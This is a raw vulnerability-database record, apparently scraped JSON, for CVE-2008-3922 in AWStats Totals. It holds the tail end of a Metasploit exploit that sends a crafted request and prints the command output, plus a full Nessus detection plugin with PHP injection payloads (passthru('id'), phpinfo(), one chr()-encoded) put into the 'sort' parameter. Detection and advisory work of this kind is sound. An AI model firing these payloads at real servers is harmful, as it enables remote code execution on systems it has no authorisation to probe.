\n \nres = send_request_raw({ \n'uri' => sploit, \n'method' => 'GET', \n'headers' => \n{ \n'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', \n'Connection' => 'Close', \n} \n}, 25) \n \nif (res) \nprint_status(\"The server returned: #{res.code} #{res.message}\") \n \nm = res.body.match(/YYY\\n(.*)\\nYYY/m) \n \nif (m) \nprint_status(\"Command output from the server:\") \nprint(\"\\n\" + m[1] + \"\\n\\n\") \nelse \nprint_status(\"This server may not be vulnerable\") \nend \nelse \nprint_status(\"No response from the server\") \nend \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101698/awstatstotals_multisort.rb.txt"}], "nessus": [{"lastseen": "2021-01-20T09:25:08", "description": "The remote web server is running a version of awstatstotals.php which\ndoes not properly sanitize its 'sort' argument. An attacker can run\narbitrary commands on the remote host within the context of the web\nserver.", "edition": 26, "published": "2008-08-27T00:00:00", "title": "AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3922"], "modified": "2008-08-27T00:00:00", "cpe": [], "id": "AWSTATSTOTALS_SORT_REMOTE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/34055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34055);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-3922\");\n script_bugtraq_id(30856);\n script_xref(name:\"EDB-ID\", value:\"17324\");\n\n script_name(english:\"AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution\");\n script_summary(english:\"run a command through awstatstotals.php?sort\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of awstatstotals.php which\ndoes not properly sanitize its 'sort' argument. An attacker can run\narbitrary commands on the remote host within the context of the web\nserver.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/20080826165439.GQ10038@dx4.org\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.telartis.nl/en/awstats\" );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Telartis AWStats Totals 1.15\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Awstats Totals <= 1.14 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats Totals multisort Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (get_kb_item(\"Settings/disable_cgi_scanning\")) exit(0);\n\nport = get_http_port(default: 80);\n\nif (thorough_tests)\n dirs = get_kb_list(string(\"www/\", port, \"/content/directories\"));\nif (isnull(dirs)) dirs = make_list(\"\", \"/stat\", \"/awstatstotals\");\ndirs = list_uniq(make_list(dirs, cgi_dirs()));\nreport = \"\";\n\nattacks = make_list(\n'/awstatstotals.php?sort=\"].passthru(\\'id\\').exit().%24a[\"',\n'/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}}',\n'/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\"',\n'/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}}' );\n\nforeach d (dirs)\n{\n foreach a (attacks)\n {\n u = strcat(d, a);\n w = http_send_recv3(method:\"GET\",item: u, port: port);\n if (isnull(w))\n if (report)\n break;\n else\n exit(0);\n r = w[2];\n if (\"phpinfo\" >< a)\n {\n if (\n \"<title>phpinfo()</title>\" >< r && \n \"HTTP_HOST\" >< r &&\n \"SERVER_PORT\" >< r &&\n egrep(string: r, pattern: \"X-Powered-By.*PHP/[1-9]\\.\") &&\n egrep(pattern:\"\\>PHP Version (.+)\\<\", string:w[2])\n )\n {\n report = strcat(report, '\\n', build_url(port: port, qs: u), '\\nran the phpinfo() function command successfully.\\n');\n break;\n }\n }\n else\n {\n if (egrep(string: r, pattern: \"^uid=[0-9]+.* gid=[0-9]+\"))\n {\n report = strcat(report, '\\n', build_url(port: port, qs: u), '\\nran the id command successfully and produced the following output:\\n', chomp(r), '\\n');\n break;\n }\n }\n }\n if (report && ! thorough_tests) break;\n}\n\nif (report) security_hole(port: port, extra: report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}